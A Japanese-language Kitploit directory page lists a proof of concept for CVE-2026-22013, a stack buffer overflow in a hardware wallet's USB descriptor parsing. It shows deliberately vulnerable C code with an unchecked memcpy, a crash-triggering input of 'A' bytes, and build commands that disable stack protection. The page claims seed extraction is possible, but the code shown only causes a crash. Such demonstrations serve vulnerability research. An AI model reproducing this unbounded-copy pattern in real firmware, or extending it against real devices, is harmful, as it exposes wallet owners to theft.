Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — ハードウェアウォレットのUSBディスクリプターパーサー(CVE-2026-22013)に対するスタックバッファオーバーフローのPoCで、過大なGET_DESCRIPTORペイロードによる戻りアドレスの上書きとコード実行を示します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
組み込みシステムセキュリティ脆弱性分析エクスプロイトハードウェアハッキングハードウェアセキュリティバイナリエクスプロイト
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

ハードウェアウォレットのUSBディスクリプターパーサー(CVE-2026-22013)に対するスタックバッファオーバーフローのPoCで、過大なGET_DESCRIPTORペイロードによる戻りアドレスの上書きとコード実行を示します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
16日前未レビュー

CVE-2026-22013 – ハードウェアウォレット USB ディスクリプタのバッファオーバーフロー

プログラムコード(C ファームウェアシミュレーション)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – ハードウェアウォレット USB ディスクリプタのバッファオーバーフロー

Severity: Critical

概要

ハードウェアウォレットの USB スタックには、過大なペイロードを持つ GET_DESCRIPTOR リクエストを解析する際にスタックバッファオーバーフローが発生します。物理的に USB へアクセスできる攻撃者は、これを悪用してリターンアドレスを上書きし、コード実行を達成してシードフレーズを抽出できます。

脆弱性の詳細

  • 種類: スタックバッファオーバーフロー
  • 影響: デバイスの完全な侵害、シードの抽出。
  • 根本原因: 固定サイズのバッファにコピーする前に、ディスクリプタの長さフィールドが検証されていない。

エクスプロイトのデモンストレーション

ターゲットアーキテクチャ用にコンパイルして実行します(シミュレーション):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

プログラムはスタック破壊によりクラッシュします。

ツールをダウンロード